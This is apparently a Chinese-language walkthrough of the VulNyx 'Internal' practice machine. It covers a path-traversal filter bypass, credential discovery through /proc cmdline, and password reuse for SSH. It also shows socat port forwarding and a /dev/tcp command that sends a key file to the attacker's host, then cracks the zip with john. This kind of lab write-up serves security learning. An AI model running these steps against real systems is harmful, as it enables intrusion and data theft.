VulNyx - Internal

---

扫描发现有三个端口

---

---

---

---

basic验证需要用户名密码登录

---

---

访问80端口

\URLFinder 发现有个internal的php文件

---

---

---

看看有无任意文件读取漏洞



发现没有回显 但是总感觉怪怪的 应该是有啥东西 因为他这里的出现了pre 标签也许他是过滤了../ 我们改成....//试试



真的读取到了

---

---

---

通过读取passwd发现有个admin用户

admin:x:1000:1000:admin,,,:/home/admin:/bin/bash

在爆破9999端口basic验证无效之后 其实就不知道咋搞了

---

---

---

看wp学习到我们可以利用proc文件夹来读取更多的信息

可以看这篇文章proc

cat /proc/【pid】/cmdline 可以读取到当前进程是在执行什么

例如



就可以看到 pid为1的进程在执行 initsplash

---

---

我们利用这一点直接爆破





发现basic的密码了



登录成功 但是没发现啥东西

除此之外我们还发现了一个有趣的端口5901 这是vnc的端口

---

---

---

尝试一下用同样的密码能否ssh登录



登录成功

---

---

ss -al 查看所有socket监听端口

发现了这个5901的端口 这个端口可以vnc登录 但是他绑定了本机也就是说他只允许本地地址访问

我们需要将他的端口转发出来让内网的kali也就是我们的攻击机能访问得到 这就需要端口转发的工具socat

---

---

先wget 一下socatx64.bin

然后

./socatx64.bin TCP-LISTEN:5900,fork TCP4:192.168.200.246:5901&

将端口5901转发到端口5900

再来ss -la查看一下我们看到5900前面是0.0.0.0也就是说其他主机也可以访问了不再局限于本机ip

---

---

那么接下来我们要看看如何登录vnc了



vnc登录需要一个passwd的文件

这里挺阴险的他有个隐藏文件...



cd ...就能看到passwd文件了

---

---

是个zip



解压需要密码

---

---

将这个文件传给kali

用nc传输

kali:nc -lp 10888 > a.zip

靶机：cat internalkey.zip > /dev/tcp/192.168.200.101/10888

---

---

将zip转化为hash以便爆破密码zip2john a.zip> tmp

再用john爆破Miami john tmp --wordlist=/root/Desktop/fuzz/rockyou.txt/rockyou.txt

但是发现爆破不出来

---

---

猜测还是之前那个basic的密码

解压成功

接下来直接用vncviwer就OK了

vncviewer 192.168.200.246:5900 -passwd passwd

但是我不知道除了啥问题总是说vncviewer: VNC server closed connection 反正总体思路就是这样